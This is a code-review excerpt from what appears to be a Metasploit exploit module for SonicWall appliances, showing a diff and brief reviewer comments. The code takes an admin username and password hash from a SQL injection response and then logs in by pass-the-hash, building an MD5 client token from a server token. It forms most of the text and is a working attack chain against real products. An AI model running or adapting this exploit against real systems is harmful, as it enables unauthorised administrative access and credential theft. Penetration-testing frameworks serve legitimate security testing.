modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb

```diff
@@ -0,0 +1,380 @@
+        'Accept' => '*/*',
+        'Connection' => 'close'
+      }
+    )
+
+    # Sanity checks
+    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200
+    fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.nil?
+
+    # This field has the SQL injection response
+    hash = res.get_json_document['alias']
+
+    # If the server responds with an error, it has no 'alias' field so the key
+    # is missing entirely (this is where it fails against patched targets)
+    fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil?
+
+    # If alias is present but contains nothing, that means our query got no
+    # results (probably there are no active users, or something?)
+    fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty?
+
+    # If there's no ':' in the response, something super weird happened
+    fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')
+
+    username, hash = hash.split(/:/, 2)
+    print_good("Found an account: #{username}:#{hash}")
+
+    [username, hash]
+  end
+
+  # Exploits CVE-2023-34132 (pass the hash)
+  def authenticate(username, hash)
+    # Grab server hashing token
+    vprint_status('Grabbing server hashing token...')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/appliance/login'),
+      'keep_cookies' => true
+    )
+    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?
+
+    # Look for the getPwdHash function call, as it contains the token we need
+    if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?
+      fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')
+    end
+
+    server_token = ::Regexp.last_match(1)
+    vprint_status("Got the server-side token: #{server_token}")
+
+    # Generate the client_hash by combining the server token + the stolen
+    # password hash
+    client_hash = Digest::MD5.hexdigest(server_token + hash)
+    vprint_status("Generated client token: #{client_hash}")
+
+    # Send the token
+    print_status('Attempting to authenticate with the client token + password hash...')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'action' => 'login',
+        'skipSessionCheck' => '0',
+        'needPwdChange' => '0',
+        'clientHash' => client_hash,
+        'password' => hash,
+        'applianceUser' => username,
+        'appliancePassword' => 'Nice Try',
```

Comment:
Can this be randomized?

Reply:
That's what the actual application sends, believe it or not

Reply:
Sick sad world…

Reply:
So taking your comments from elsewhere, I realized that that argument isn't even necessary, nor are most of the others. I stripped it down to the minimum it needs to work.